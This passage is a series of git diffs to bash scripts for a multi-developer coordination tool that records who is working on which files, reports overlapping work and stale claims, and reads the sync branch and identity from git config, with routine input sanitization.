+  # Sanitize and validate
+  local issue_id
+  issue_id="$(sanitize "$raw_issue_id")"
+  issue_id="$(printf '%s' "$issue_id" | sed 's/^[[:space:]]*//;s/[[:space:]]*$//')"
+  _validate_issue_id "$issue_id" || return 1
+
+  # Generate timestamp
+  local updated_at
+  updated_at="$(date -u +%Y-%m-%dT%H:%M:%SZ)"
+
+  # Build tombstone JSON using jq
+  local json_line
+  json_line="$(jq -n -c \
+    --arg id "$issue_id" \
+    --arg ts "$updated_at" \
+    '{
+      issue_id: $id,
+      developer: "",
+      files: [],
+      modules: [],
+      updated_at: $ts,
+      tombstone: true
+    }')"
+
+  # Append to JSONL file
+  local jsonl_path
+  jsonl_path="$(_file_index_path)"
+  mkdir -p "$(dirname "$jsonl_path")"
+  printf '%s\n' "$json_line" >> "$jsonl_path"
+}
+
+# file_index_read
+# Read all entries, resolve LWW per issue_id, output active entries as JSON array.
+# Returns "[]" if the file is missing or empty.
+file_index_read() {
+  local jsonl_path
+  jsonl_path="$(_file_index_path)"
+
+  # Handle missing or empty file
+  if [[ ! -f "$jsonl_path" ]] || [[ ! -s "$jsonl_path" ]]; then
+    printf '%s' "[]"
+    return 0
+  fi
+
+  # Use jq to:
+  # 1. Slurp all lines into an array
+  # 2. Group by issue_id
+  # 3. For each group, sort by updated_at and take the last (LWW)
+  # 4. Filter out tombstoned entries
+  jq -s -c '
+    group_by(.issue_id)
+    | map(sort_by(.updated_at) | last)
+    | map(select(.tombstone == false))
+  ' "$jsonl_path"
+}
+
+# file_index_get <issue_id>
+# Get a single issue's file entry (after LWW resolution).
+# Returns "null" if not found or tombstoned.
+file_index_get() {
+  local raw_issue_id="$1"
+
+  # Sanitize and validate
+  local issue_id
+  issue_id="$(sanitize "$raw_issue_id")"
+  issue_id="$(printf '%s' "$issue_id" | sed 's/^[[:space:]]*//;s/[[:space:]]*$//')"
+  _validate_issue_id "$issue_id" || return 1
+
+  local jsonl_path
+  jsonl_path="$(_file_index_path)"
+
+  # Handle missing or empty file
+  if [[ ! -f "$jsonl_path" ]] || [[ ! -s "$jsonl_path" ]]; then
+    printf '%s' "null"
+    return 0
+  fi
+
+  # Use jq to filter by issue_id, resolve LWW, check tombstone
+  jq -s -c --arg id "$issue_id" '
+    map(select(.issue_id == $id))
+    | sort_by(.updated_at)
+    | last
+    | if . == null then null
+      elif .tombstone == true then null
+      else .
+      end
+  ' "$jsonl_path"
+}
+
+# ── Main dispatcher (when run as a script) ────────────────────────────────
+
+if [[ "${BASH_SOURCE[0]}" == "${0}" ]]; then
+  if [[ $# -lt 1 ]]; then
+    cat >&2 <<'EOF'
+Usage: file-index.sh <subcommand> [args...]
+
+Subcommands:
+  add     <issue_id> <developer> <files_json> <modules_json>
+  remove  <issue_id>
+  read
+  get     <issue_id>
+EOF
+    exit 1
+  fi
+
+  subcommand="$1"
+  shift
+
+  case "$subcommand" in
+    add)    file_index_add "$@" ;;
+    remove) file_index_remove "$@" ;;
+    read)   file_index_read ;;
+    get)    file_index_get "$@" ;;
+    *)
+      echo "Error: Unknown subcommand '${subcommand}'" >&2
+      exit 1
+      ;;
+  esac
+fi

--- a/scripts/file-index.sh
+++ b/scripts/file-index.sh
@@ -299,15 +299,11 @@ file_index_update_from_tasks() {
     fi
   fi
 
-  # Sanitize file paths and deduplicate
-  local -a clean_files=()
-  local -a clean_modules=()
-  local -A seen_files=()
-  local -A seen_modules=()
+  # Sanitize file paths, derive modules, deduplicate via jq (Bash 3.2 compatible)
+  local sanitized_paths=""
 
   for raw_path in "${raw_files[@]}"; do
     # OWASP A03: reject paths with shell injection patterns
-    # Skip paths containing: $( ), backticks, semicolons, pipes, &&, ||
     if printf '%s' "$raw_path" | grep -qE '(\$\(|`|;|\||\&\&|\|\|)'; then
       continue
     fi
@@ -315,35 +311,20 @@ file_index_update_from_tasks() {
     if [[ "$raw_path" =~ ^[./]+$ ]]; then
       continue
     fi
-    # Deduplicate
-    if [[ -n "${seen_files[$raw_path]+x}" ]]; then
-      continue
-    fi
-    seen_files["$raw_path"]=1
-    clean_files+=("$raw_path")
-
-    # Derive module = directory portion
-    local module
-    module="$(dirname "$raw_path")"
-    if [[ "$module" != "." ]]; then
-      module="${module}/"
-      if [[ -z "${seen_modules[$module]+x}" ]]; then
-        seen_modules["$module"]=1
-        clean_modules+=("$module")
-      fi
-    fi
+    sanitized_paths="${sanitized_paths}${raw_path}"$'\n'
   done
 
-  # Build JSON arrays using jq
+  # Build deduplicated JSON arrays using jq (no associative arrays needed)
   local files_json modules_json
-  if [[ ${#clean_files[@]} -gt 0 ]]; then
-    files_json="$(printf '%s\n' "${clean_files[@]}" | jq -R . | jq -s -c .)"
+  if [[ -n "$sanitized_paths" ]]; then
+    files_json="$(printf '%s' "$sanitized_paths" | grep -v '^$' | jq -R . | jq -s -c 'unique')"
+    modules_json="$(printf '%s' "$sanitized_paths" | grep -v '^$' | while IFS= read -r p; do
+      local d
+      d="$(dirname "$p")"
+      if [[ "$d" != "." ]]; then printf '%s\n' "${d}/"; fi
+    done | jq -R . | jq -s -c 'unique')"
   else
     files_json="[]"
-  fi
-  if [[ ${#clean_modules[@]} -gt 0 ]]; then
-    modules_json="$(printf '%s\n' "${clean_modules[@]}" | jq -R . | jq -s -c .)"
-  else
     modules_json="[]"
   fi
 

--- a/scripts/file-index.sh
+++ b/scripts/file-index.sh
@@ -185,7 +185,8 @@ file_index_read() {
   # 3. For each group, sort by updated_at and take the last (LWW)
   # 4. Filter out tombstoned entries
   jq -s -c '
-    group_by(.issue_id)
+    sort_by(.issue_id)
+    | group_by(.issue_id)
     | map(sort_by(.updated_at) | last)
     | map(select(.tombstone == false))
   ' "$jsonl_path"

--- a/scripts/file-index.sh
+++ b/scripts/file-index.sh
@@ -5,10 +5,11 @@
 # is working on which files/modules, keyed by issue_id.
 #
 # Functions (source this file):
-#   file_index_add    <issue_id> <developer> <files_json> <modules_json>
-#   file_index_remove <issue_id>
+#   file_index_add                <issue_id> <developer> <files_json> <modules_json>
+#   file_index_remove             <issue_id>
 #   file_index_read
-#   file_index_get    <issue_id>
+#   file_index_get                <issue_id>
+#   file_index_update_from_tasks  <issue_id> <task_file_path> [action]
 #
 # Uses jq for all JSON construction (never string concatenation).
 # OWASP A03: All inputs validated and shell-injection patterns stripped.
@@ -223,6 +224,163 @@ file_index_get() {
   ' "$jsonl_path"
 }
 
+# file_index_update_from_tasks <issue_id> <task_file_path> [action]
+# Parse a task file for File(s): lines, extract file paths, derive modules,
+# and update the file index using the current session identity.
+#
+# action: "in_progress" (default) — adds/updates entry
+#         "closed"               — appends tombstone via file_index_remove
+#
+# Edge cases:
+#   - Missing task file or no File(s): lines → fallback with confidence: "low"
+#   - File paths are sanitized against shell injection (OWASP A03)
+file_index_update_from_tasks() {
+  local raw_issue_id="$1"
+  local task_file_path="${2:-}"
+  local action="${3:-in_progress}"
+
+  # Sanitize and validate issue_id
+  local issue_id
+  issue_id="$(sanitize "$raw_issue_id")"
+  issue_id="$(printf '%s' "$issue_id" | sed 's/^[[:space:]]*//;s/[[:space:]]*$//')"
+  _validate_issue_id "$issue_id" || return 1
+
+  # Handle closed action: just tombstone
+  if [[ "$action" == "closed" ]]; then
+    file_index_remove "$issue_id"
+    return 0
+  fi
+
+  # Get session identity (source sync-utils.sh if get_session_identity not defined)
+  local developer
+  if ! command -v get_session_identity &>/dev/null; then
+    local script_dir
+    script_dir="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+    if [[ -f "$script_dir/sync-utils.sh" ]]; then
+      source "$script_dir/sync-utils.sh"
+    fi
+  fi
+  developer="$(get_session_identity)" || {
+    echo "Error: could not determine session identity" >&2
+    return 1
+  }
+
+  # Parse task file for File(s): lines
+  local -a raw_files=()
+  local confidence="high"
+
+  if [[ -z "$task_file_path" ]] || [[ ! -f "$task_file_path" ]]; then
+    # Fallback: no task file
+    confidence="low"
+  else
+    # Extract backtick-quoted paths from File(s): lines (case-insensitive)
+    local line
+    while IFS= read -r line; do
+      # Extract all backtick-quoted strings from this line
+      local path
+      while [[ "$line" =~ \`([^\`]+)\` ]]; do
+        path="${BASH_REMATCH[1]}"
+        # Strip annotations like " (extend)", " (run script only)" — remove
+        # from the path anything after the file extension that looks like an annotation
+        path="$(printf '%s' "$path" | sed 's/[[:space:]]*([^)]*)//g')"
+        # Trim whitespace
+        path="$(printf '%s' "$path" | sed 's/^[[:space:]]*//;s/[[:space:]]*$//')"
+        if [[ -n "$path" ]]; then
+          raw_files+=("$path")
+        fi
+        # Remove the matched backtick segment and continue
+        line="${line#*\`${BASH_REMATCH[1]}\`}"
+      done
+    done < <(grep -i '^File(s):' "$task_file_path" 2>/dev/null || true)
+
+    # If no File(s): lines found, fall back
+    if [[ ${#raw_files[@]} -eq 0 ]]; then
+      confidence="low"
+    fi
+  fi
+
+  # Sanitize file paths and deduplicate
+  local -a clean_files=()
+  local -a clean_modules=()
+  local -A seen_files=()
+  local -A seen_modules=()
+
+  for raw_path in "${raw_files[@]}"; do
+    # OWASP A03: reject paths with shell injection patterns
+    # Skip paths containing: $( ), backticks, semicolons, pipes, &&, ||
+    if printf '%s' "$raw_path" | grep -qE '(\$\(|`|;|\||\&\&|\|\|)'; then
+      continue
+    fi
+    # Skip paths with only dots/slashes (directory traversal)
+    if [[ "$raw_path" =~ ^[./]+$ ]]; then
+      continue
+    fi
+    # Deduplicate
+    if [[ -n "${seen_files[$raw_path]+x}" ]]; then
+      continue
+    fi
+    seen_files["$raw_path"]=1
+    clean_files+=("$raw_path")
+
+    # Derive module = directory portion
+    local module
+    module="$(dirname "$raw_path")"
+    if [[ "$module" != "." ]]; then
+      module="${module}/"
+      if [[ -z "${seen_modules[$module]+x}" ]]; then
+        seen_modules["$module"]=1
+        clean_modules+=("$module")
+      fi
+    fi
+  done
+
+  # Build JSON arrays using jq
+  local files_json modules_json
+  if [[ ${#clean_files[@]} -gt 0 ]]; then
+    files_json="$(printf '%s\n' "${clean_files[@]}" | jq -R . | jq -s -c .)"
+  else
+    files_json="[]"
+  fi
+  if [[ ${#clean_modules[@]} -gt 0 ]]; then
+    modules_json="$(printf '%s\n' "${clean_modules[@]}" | jq -R . | jq -s -c .)"
+  else
+    modules_json="[]"
+  fi
+
+  # Build and append the entry
+  local updated_at
+  updated_at="$(date -u +%Y-%m-%dT%H:%M:%SZ)"
+
+  local jsonl_path
+  jsonl_path="$(_file_index_path)"
+  mkdir -p "$(dirname "$jsonl_path")"
+
+  if [[ "$confidence" == "low" ]]; then
+    # Include confidence field for fallback entries
+    local json_line
+    json_line="$(jq -n -c \
+      --arg id "$issue_id" \
+      --arg dev "$developer" \
+      --argjson files "$files_json" \
+      --argjson modules "$modules_json" \
+      --arg ts "$updated_at" \
+      --arg conf "$confidence" \
+      '{
+        issue_id: $id,
+        developer: $dev,
+        files: $files,
+        modules: $modules,
+        updated_at: $ts,
+        tombstone: false,
+        confidence: $conf
+      }')"
+    printf '%s\n' "$json_line" >> "$jsonl_path"
+  else
+    # Normal entry via file_index_add (no confidence field needed)
+    file_index_add "$issue_id" "$developer" "$files_json" "$modules_json"
+  fi
+}
+
 # ── Main dispatcher (when run as a script) ────────────────────────────────
 
 if [[ "${BASH_SOURCE[0]}" == "${0}" ]]; then
@@ -231,10 +389,11 @@ if [[ "${BASH_SOURCE[0]}" == "${0}" ]]; then
 Usage: file-index.sh <subcommand> [args...]
 
 Subcommands:
-  add     <issue_id> <developer> <files_json> <modules_json>
-  remove  <issue_id>
+  add              <issue_id> <developer> <files_json> <modules_json>
+  remove           <issue_id>
   read
-  get     <issue_id>
+  get              <issue_id>
+  update-from-tasks <issue_id> <task_file_path> [action]
 EOF
     exit 1
   fi
@@ -243,10 +402,11 @@ EOF
   shift
 
   case "$subcommand" in
-    add)    file_index_add "$@" ;;
-    remove) file_index_remove "$@" ;;
-    read)   file_index_read ;;
-    get)    file_index_get "$@" ;;
+    add)               file_index_add "$@" ;;
+    remove)            file_index_remove "$@" ;;
+    read)              file_index_read ;;
+    get)               file_index_get "$@" ;;
+    update-from-tasks) file_index_update_from_tasks "$@" ;;
     *)
       echo "Error: Unknown subcommand '${subcommand}'" >&2
       exit 1

--- a/scripts/file-index.sh
+++ b/scripts/file-index.sh
@@ -281,16 +281,18 @@ file_index_update_from_tasks() {
       local path
       while [[ "$line" =~ \`([^\`]+)\` ]]; do
         path="${BASH_REMATCH[1]}"
-        # Strip annotations like " (extend)", " (run script only)" — remove
-        # from the path anything after the file extension that looks like an annotation
-        path="$(printf '%s' "$path" | sed 's/[[:space:]]*([^)]*)//g')"
+        # Strip only trailing annotations like " (extend)" at end of path
+        # Anchored to $ to avoid corrupting paths with parentheses (e.g., test(1).spec.ts)
+        path="$(printf '%s' "$path" | sed 's/[[:space:]]*([^)]*)$//')"
         # Trim whitespace
         path="$(printf '%s' "$path" | sed 's/^[[:space:]]*//;s/[[:space:]]*$//')"
         if [[ -n "$path" ]]; then
           raw_files+=("$path")
         fi
-        # Remove the matched backtick segment and continue
-        line="${line#*\`${BASH_REMATCH[1]}\`}"
+        # Remove the matched backtick segment — use fixed pattern to avoid
+        # glob interpretation of path characters like [ ] * ?
+        line="${line#*\`}"      # strip up to and including the opening backtick
+        line="${line#*\`}"      # strip the content and closing backtick
       done
     done < <(grep -i '^File(s):' "$task_file_path" 2>/dev/null || true)
 

--- a/scripts/smart-status.sh
+++ b/scripts/smart-status.sh
@@ -516,7 +516,7 @@ if command -v file_index_read &>/dev/null && command -v get_session_identity &>/
       # Build team activity: filter out current dev, compute overlaps and staleness
       # Current dev's modules (for overlap detection)
       _my_modules="$(printf '%s' "$_file_index_all" | jq -c --arg me "$_my_identity" \
-        '[.[] | select(.developer == $me) | .modules // [] | .[]] | unique')"
+        '[.[] | select(.developer == $me) | .modules // [] | .[]] | unique')" || _my_modules="[]"
 
       # STALENESS_THRESHOLD_SECS = 48 hours = 172800 seconds
       TEAM_ACTIVITY_JSON="$(printf '%s' "$_file_index_all" | jq -c --arg me "$_my_identity" \
@@ -548,7 +548,7 @@ if command -v file_index_read &>/dev/null && command -v get_session_identity &>/
             overlapping_modules: $overlaps,
             updated_at: $entry.updated_at
           }
-        ] | group_by(.developer) | map({
+        ] | sort_by(.developer) | group_by(.developer) | map({
           developer: .[0].developer,
           issues: [.[] | {
             issue_id: .issue_id,
@@ -559,7 +559,7 @@ if command -v file_index_read &>/dev/null && command -v get_session_identity &>/
             overlapping_modules: .overlapping_modules
           }]
         })
-      ')"
+      ')" || TEAM_ACTIVITY_JSON="[]"
     fi
   fi
 fi

--- a/scripts/smart-status.sh
+++ b/scripts/smart-status.sh
@@ -62,6 +62,16 @@ if ! command -v jq &>/dev/null; then
   exit 1
 fi
 
+# Warn if jq < 1.6 (fromdateiso8601 and sub/2 require 1.6+)
+_jq_version="$(jq --version 2>/dev/null | sed 's/jq-//')" || true
+if [ -n "$_jq_version" ]; then
+  _jq_major="${_jq_version%%.*}"
+  _jq_minor="${_jq_version#*.}"; _jq_minor="${_jq_minor%%.*}"
+  if [ "${_jq_major:-0}" -lt 1 ] || { [ "${_jq_major:-0}" -eq 1 ] && [ "${_jq_minor:-0}" -lt 6 ]; }; then
+    echo "Warning: jq $_jq_version detected — staleness features require jq 1.6+. Team Activity may not display." >&2
+  fi
+fi
+
 # ── Configuration ───────────────────────────────────────────────────────
 
 BD="${BD_CMD:-bd}"

--- a/scripts/smart-status.sh
+++ b/scripts/smart-status.sh
@@ -39,6 +39,18 @@ sanitize() {
   printf '%s' "$val"
 }
 
+# ── Source cross-dev awareness scripts ────────────────────────────────
+# file-index.sh: file_index_read for reading file index entries
+# sync-utils.sh: get_session_identity for current developer identity
+
+_SMART_STATUS_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+if [ -f "$_SMART_STATUS_DIR/file-index.sh" ]; then
+  source "$_SMART_STATUS_DIR/file-index.sh"
+fi
+if [ -f "$_SMART_STATUS_DIR/sync-utils.sh" ]; then
+  source "$_SMART_STATUS_DIR/sync-utils.sh"
+fi
+
 # ── Dependency check ────────────────────────────────────────────────────
 
 if ! command -v jq &>/dev/null; then
@@ -481,12 +493,84 @@ PAIRSEOF
   fi
 fi
 
+# ── Cross-developer team activity ────────────────────────────────────────
+# Read file index entries from all developers, identify OTHER developers'
+# in-progress work, compute module overlaps, and flag stale claims.
+
+TEAM_ACTIVITY_JSON="[]"
+
+# Only proceed if file_index_read and get_session_identity are available
+if command -v file_index_read &>/dev/null && command -v get_session_identity &>/dev/null; then
+  _file_index_all="$(file_index_read 2>/dev/null || echo '[]')"
+  _file_index_len="$(printf '%s' "$_file_index_all" | jq 'length')"
+
+  if [ "$_file_index_len" -gt 0 ]; then
+    _my_identity="$(get_session_identity 2>/dev/null || echo '')"
+
+    # Allow override via SMART_STATUS_IDENTITY env (for testing)
+    if [ -n "${SMART_STATUS_IDENTITY:-}" ]; then
+      _my_identity="$SMART_STATUS_IDENTITY"
+    fi
+
+    if [ -n "$_my_identity" ]; then
+      # Build team activity: filter out current dev, compute overlaps and staleness
+      # Current dev's modules (for overlap detection)
+      _my_modules="$(printf '%s' "$_file_index_all" | jq -c --arg me "$_my_identity" \
+        '[.[] | select(.developer == $me) | .modules // [] | .[]] | unique')"
+
+      # STALENESS_THRESHOLD_SECS = 48 hours = 172800 seconds
+      TEAM_ACTIVITY_JSON="$(printf '%s' "$_file_index_all" | jq -c --arg me "$_my_identity" \
+        --argjson my_modules "$_my_modules" \
+        --arg now_ts "$(date +%s)" '
+        [.[] | select(.developer != $me) |
+          . as $entry |
+          # Compute staleness
+          (if .updated_at then
+            ((.updated_at | sub("\\.[0-9]+Z$"; "Z")) | fromdateiso8601) as $ts |
+            (($now_ts | tonumber) - $ts) as $age_secs |
+            {
+              age_secs: $age_secs,
+              stale: ($age_secs > 172800),
+              days_ago: (($age_secs / 86400) | floor)
+            }
+          else
+            { age_secs: 0, stale: false, days_ago: 0 }
+          end) as $staleness |
+          # Compute module overlaps
+          ([$entry.modules // [] | .[] | select(. as $m | $my_modules | index($m))] | unique) as $overlaps |
+          {
+            developer: $entry.developer,
+            issue_id: $entry.issue_id,
+            modules: ($entry.modules // []),
+            files: ($entry.files // []),
+            stale: $staleness.stale,
+            days_ago: $staleness.days_ago,
+            overlapping_modules: $overlaps,
+            updated_at: $entry.updated_at
+          }
+        ] | group_by(.developer) | map({
+          developer: .[0].developer,
+          issues: [.[] | {
+            issue_id: .issue_id,
+            modules: .modules,
+            files: .files,
+            stale: .stale,
+            days_ago: .days_ago,
+            overlapping_modules: .overlapping_modules
+          }]
+        })
+      ')"
+    fi
+  fi
+fi
+
 # ── Output ──────────────────────────────────────────────────────────────
 
 if [ "$JSON_MODE" = "1" ]; then
-  # Always output consistent shape: {sessions: [...], issues: [...]}
+  # Always output consistent shape: {sessions: [...], issues: [...], team_activity: [...]}
   jq -n --argjson sessions "$SESSIONS_JSON" --argjson issues "$SCORED_JSON" \
-    '{sessions: $sessions, issues: $issues}'
+    --argjson team_activity "$TEAM_ACTIVITY_JSON" \
+    '{sessions: $sessions, issues: $issues, team_activity: $team_activity}'
 else
   # Grouped, colored output
   # NO_COLOR support: https://no-color.org/
@@ -543,6 +627,40 @@ else
           end
         )
       else empty end)
+    '
+    printf '\n'
+  fi
+
+  # ── Team Activity (cross-developer visibility) ──
+  _ta_len="$(printf '%s' "$TEAM_ACTIVITY_JSON" | jq 'length')"
+  if [ "$_ta_len" -gt 0 ]; then
+    printf '%s%s── Team Activity ──────────────────────────────────────%s\n' "$C_BOLD" "$C_CYAN" "$C_RESET"
+    printf '%s' "$TEAM_ACTIVITY_JSON" | jq -r '
+      .[] |
+      .developer as $dev |
+      "  " + $dev + ":",
+      (.issues[] |
+        .issue_id as $iid |
+        .modules as $mods |
+        .stale as $stale |
+        .days_ago as $days |
+        .overlapping_modules as $overlaps |
+        # Issue line with optional stale annotation
+        (if $stale then
+          "    " + $iid + " (in_progress, stale: claimed " + ($days | tostring) + " days ago)"
+        else
+          "    " + $iid + " (in_progress)" +
+            (if ($mods | length) > 0 then
+              " — touching " + ($mods | join(", "))
+            else "" end)
+        end),
+        # Overlap or no-overlap line
+        (if ($overlaps | length) > 0 then
+          "    ! Overlap: " + ($overlaps | join(", ")) + " (you are also working here)"
+        else
+          "    No overlaps with your work"
+        end)
+      )
     '
     printf '\n'
   fi

--- a/scripts/smart-status.sh
+++ b/scripts/smart-status.sh
@@ -107,7 +107,7 @@ ISSUES_JSON="$("$BD" list --json --limit 0 2>/dev/null || echo '[]')"
 # Bail early on empty
 if [ "$(printf '%s' "$ISSUES_JSON" | jq 'length')" = "0" ]; then
   if [ "$JSON_MODE" = "1" ]; then
-    echo '{"sessions":[],"issues":[]}'
+    echo '{"sessions":[],"issues":[],"team_activity":[]}'
   else
     echo "No issues found."
   fi

--- a/scripts/sync-utils.sh
+++ b/scripts/sync-utils.sh
@@ -301,6 +301,10 @@ auto_sync() {
     local last_ts="unknown"
     if [[ -f "$last_sync_file" ]]; then
       last_ts="$(cat "$last_sync_file")"
+      if [[ "$last_ts" =~ ^[0-9]+$ ]]; then
+        local mins=$(( ($(date +%s) - last_ts) / 60 ))
+        last_ts="${mins}m ago"
+      fi
     fi
     echo "Warning: sync failed, working with local data (last sync: $last_ts)" >&2
   fi

--- a/scripts/sync-utils.sh
+++ b/scripts/sync-utils.sh
@@ -62,6 +62,9 @@ get_session_identity() {
     return 1
   fi
 
+  # Replace spaces with hyphens (common in git user.name like "John Doe")
+  user_part="${user_part// /-}"
+  host_part="${host_part// /-}"
   local identity="${user_part}@${host_part}"
 
   # OWASP A03: validate before returning
@@ -338,7 +341,8 @@ _auto_sync_update_file_index() {
   # Extract in-progress issue IDs (LWW resolution: group by id, take last, filter in_progress)
   local issue_ids
   issue_ids="$(jq -s -r '
-    group_by(.id)
+    sort_by(.id)
+    | group_by(.id)
     | map(sort_by(.updated_at) | last)
     | map(select(.status == "in_progress"))
     | .[].id

--- a/scripts/sync-utils.sh
+++ b/scripts/sync-utils.sh
@@ -1,0 +1,252 @@
+#!/usr/bin/env bash
+# sync-utils.sh — Shared utilities for multi-dev-awareness sync scripts.
+#
+# Source this file; do not execute directly.
+# Cross-platform: works on Windows (Git Bash), macOS, and Linux.
+# OWASP A03: All identity strings validated against strict allowlist regex.
+# OWASP A03: All config values sanitized before use (no injection vectors).
+
+# ── Session Identity ───────────────────────────────────────────────────
+
+# Validates a session identity string against the allowlist regex.
+# Returns 0 if valid, 1 if invalid.
+# Usage: validate_session_identity "user@hostname"
+validate_session_identity() {
+  local identity="${1:-}"
+  if [[ -z "$identity" ]]; then
+    return 1
+  fi
+  # OWASP A03: strict allowlist — only alphanumeric, dot, underscore, @, +, hyphen
+  if [[ "$identity" =~ ^[a-zA-Z0-9._@+-]+$ ]]; then
+    return 0
+  fi
+  return 1
+}
+
+# Returns a session identity string in the format: <user>@<hostname>
+# Uses git config user.email if available, falls back to git config user.name.
+# Validates the result against OWASP A03 allowlist regex.
+# Outputs the identity via printf (not echo) and returns 0 on success, 1 on failure.
+# Usage: identity="$(get_session_identity)"
+get_session_identity() {
+  local user_part=""
+  local host_part=""
+
+  # Try email first, fall back to user.name
+  user_part="$(git config user.email 2>/dev/null)" || true
+  if [[ -z "$user_part" ]]; then
+    user_part="$(git config user.name 2>/dev/null)" || true
+  fi
+
+  if [[ -z "$user_part" ]]; then
+    echo "Error: No git user.email or user.name configured" >&2
+    return 1
+  fi
+
+  # Get short hostname — cross-platform:
+  #   Linux/macOS: hostname -s works
+  #   Windows Git Bash: hostname -s may fail, fall back to hostname + strip domain
+  host_part="$(hostname -s 2>/dev/null)" || true
+  if [[ -z "$host_part" ]]; then
+    host_part="$(hostname 2>/dev/null)" || true
+    # Strip domain suffix if present (e.g., "host.domain.com" -> "host")
+    host_part="${host_part%%.*}"
+  fi
+  if [[ -z "$host_part" ]]; then
+    echo "Error: Could not determine hostname" >&2
+    return 1
+  fi
+
+  local identity="${user_part}@${host_part}"
+
+  # OWASP A03: validate before returning
+  if ! validate_session_identity "$identity"; then
+    echo "Error: Session identity contains invalid characters: $identity" >&2
+    return 1
+  fi
+
+  printf '%s' "$identity"
+}
+
+# ── Input Sanitization ─────────────────────────────────────────────────
+
+# Sanitize a config value: strip shell-injection patterns (OWASP A03).
+# Removes: backticks, $(...), semicolons, pipes, newlines.
+# Usage: sanitized="$(sanitize_config_value "$raw")"
+sanitize_config_value() {
+  local val="$1"
+  # Remove backtick command substitution
+  val="${val//\`/}"
+  # Remove $(...) command substitution patterns (loop handles nested)
+  val="$(printf '%s' "$val" | sed -e ':loop' -e 's/\$([^()]*)//g' -e 't loop')"
+  # Remove semicolons (command chaining)
+  val="${val//;/}"
+  # Remove pipes (command chaining)
+  val="${val//|/}"
+  # Collapse newlines to spaces
+  val="$(printf '%s' "$val" | tr '\n' ' ')"
+  # Trim leading/trailing whitespace
+  val="$(printf '%s' "$val" | sed -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//')"
+  printf '%s' "$val"
+}
+
+# ── Config Reading ─────────────────────────────────────────────────────
+
+# Read a key from .beads/config.json (JSON format).
+# Usage: value="$(_read_config_json "/path/to/repo" "sync_branch")"
+# Returns empty string if file missing or key absent.
+_read_config_json() {
+  local repo_dir="$1"
+  local key="$2"
+  local config_file="$repo_dir/.beads/config.json"
+  if [ -f "$config_file" ] && command -v jq &>/dev/null; then
+    local raw
+    raw="$(jq -r --arg k "$key" '.[$k] // empty' -- "$config_file" 2>/dev/null)" || true
+    if [ -n "$raw" ]; then
+      sanitize_config_value "$raw"
+      return 0
+    fi
+  fi
+  printf ''
+}
+
+# Read a key from .beads/config.yaml (YAML format, simple grep-based).
+# Only supports top-level scalar keys (no nesting).
+# Usage: value="$(_read_config_yaml "/path/to/repo" "sync-branch")"
+# Returns empty string if file missing or key absent.
+_read_config_yaml() {
+  local repo_dir="$1"
+  local key="$2"
+  local config_file="$repo_dir/.beads/config.yaml"
+  if [ -f "$config_file" ]; then
+    local raw
+    # Match: key: "value" or key: value (strip quotes)
+    raw="$(grep -E "^${key}:" -- "$config_file" 2>/dev/null | head -1 | sed -e "s/^${key}:[[:space:]]*//" -e 's/^"//' -e 's/"$//' -e "s/^'//" -e "s/'$//")" || true
+    if [ -n "$raw" ]; then
+      sanitize_config_value "$raw"
+      return 0
+    fi
+  fi
+  printf ''
+}
+
+# Read a sync config value with fallback: config.json > config.yaml.
+# Supports both JSON key (underscore) and YAML key (hyphen) conventions.
+# Usage: value="$(_read_sync_config "/path/to/repo" "sync_branch" "sync-branch")"
+_read_sync_config() {
+  local repo_dir="$1"
+  local json_key="$2"
+  local yaml_key="$3"
+  local value
+
+  # Try JSON config first
+  value="$(_read_config_json "$repo_dir" "$json_key")"
+  if [ -n "$value" ]; then
+    printf '%s' "$value"
+    return 0
+  fi
+
+  # Try YAML config
+  value="$(_read_config_yaml "$repo_dir" "$yaml_key")"
+  if [ -n "$value" ]; then
+    printf '%s' "$value"
+    return 0
+  fi
+
+  printf ''
+}
+
+# ── Sync Branch Detection ─────────────────────────────────────────────
+
+# Detect the sync branch with a fallback chain:
+#   1. Config file (.beads/config.json sync_branch or .beads/config.yaml sync-branch)
+#   2. Environment variable BD_SYNC_BRANCH
+#   3. git symbolic-ref refs/remotes/<remote>/HEAD
+#   4. Try 'main' branch on remote
+#   5. Try 'master' branch on remote
+#
+# Usage: branch="$(get_sync_branch "/path/to/repo")"
+# Arguments:
+#   $1 — repo directory (optional, defaults to current directory)
+get_sync_branch() {
+  local repo_dir="${1:-.}"
+  local branch
+
+  # 1. Config file takes priority
+  branch="$(_read_sync_config "$repo_dir" "sync_branch" "sync-branch")"
+  if [ -n "$branch" ]; then
+    printf '%s' "$branch"
+    return 0
+  fi
+
+  # 2. Environment variable
+  if [ -n "${BD_SYNC_BRANCH:-}" ]; then
+    printf '%s' "$BD_SYNC_BRANCH"
+    return 0
+  fi
+
+  # Determine which remote to check (use get_sync_remote logic but avoid recursion)
+  local remote="origin"
+
+  # 3. git symbolic-ref refs/remotes/<remote>/HEAD
+  branch="$(git -C "$repo_dir" symbolic-ref -- "refs/remotes/${remote}/HEAD" 2>/dev/null)" || true
+  if [ -n "$branch" ]; then
+    # Strip refs/remotes/<remote>/ prefix
+    branch="${branch#refs/remotes/${remote}/}"
+    printf '%s' "$branch"
+    return 0
+  fi
+
+  # 4. Try 'main' — check if remote has it
+  if git -C "$repo_dir" rev-parse --verify -- "refs/remotes/${remote}/main" &>/dev/null; then
+    printf '%s' "main"
+    return 0
+  fi
+
+  # 5. Try 'master'
+  if git -C "$repo_dir" rev-parse --verify -- "refs/remotes/${remote}/master" &>/dev/null; then
+    printf '%s' "master"
+    return 0
+  fi
+
+  # Last resort: return 'main' as default
+  printf '%s' "main"
+}
+
+# ── Sync Remote Detection ─────────────────────────────────────────────
+
+# Detect the sync remote with a fallback chain:
+#   1. Config file (.beads/config.json sync_remote or .beads/config.yaml sync-remote)
+#   2. Environment variable BD_SYNC_REMOTE
+#   3. Detect 'upstream' remote (fork-based workflow)
+#   4. Default to 'origin'
+#
+# Usage: remote="$(get_sync_remote "/path/to/repo")"
+# Arguments:
+#   $1 — repo directory (optional, defaults to current directory)
+get_sync_remote() {
+  local repo_dir="${1:-.}"
+  local remote
+
+  # 1. Config file takes priority
+  remote="$(_read_sync_config "$repo_dir" "sync_remote" "sync-remote")"
+  if [ -n "$remote" ]; then
+    printf '%s' "$remote"
+    return 0
+  fi
+
+  # 2. Environment variable
+  if [ -n "${BD_SYNC_REMOTE:-}" ]; then
+    printf '%s' "$BD_SYNC_REMOTE"
+    return 0
+  fi
+
+  # 3. Detect 'upstream' remote (common in fork-based workflows)
